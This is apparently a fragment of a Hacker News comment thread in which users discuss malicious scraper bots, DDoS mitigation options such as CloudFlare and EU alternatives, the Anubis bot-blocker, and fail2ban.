| brain burnt by AI slop or polarizing short videos.
|
| [1] - https://anubis.techaro.lol/
| aledalgrande wrote:
| I wonder how much of the world's compute/electricity is wasted in
| malicious bots.
| d4rkn0d3z wrote:
| It's not hard to build an internet that serves the people but
| nobody will pay you to do it, and if you are so brazen as to do
| it yourself then you will be investigated, harassed, arrested,
| and beaten. Having been visited with every sorrow short of death,
| you will beg for death.
| Animats wrote:
| I wonder how much scraper effort is being spent talking to
| Samsung refrigerators and such.
| phendrenad2 wrote:
| I have a question about this part:
|
| > moving the entire hosting to CloudFlare that will do it for me
| ... nor do I want to route my visitors through tracking-enabled
| USA servers
|
| Isn't there some EU equivalent to CloudFlare he can use?
|
| It's hard to admit, but DDoS mitigation is an essential part of
| having even a simple website these days.
| singpolyma3 wrote:
| Yet another story demonstrating why you should not run fail2ban
___________________________________________________________________
(page generated 2025-11-16 23:01 UTC)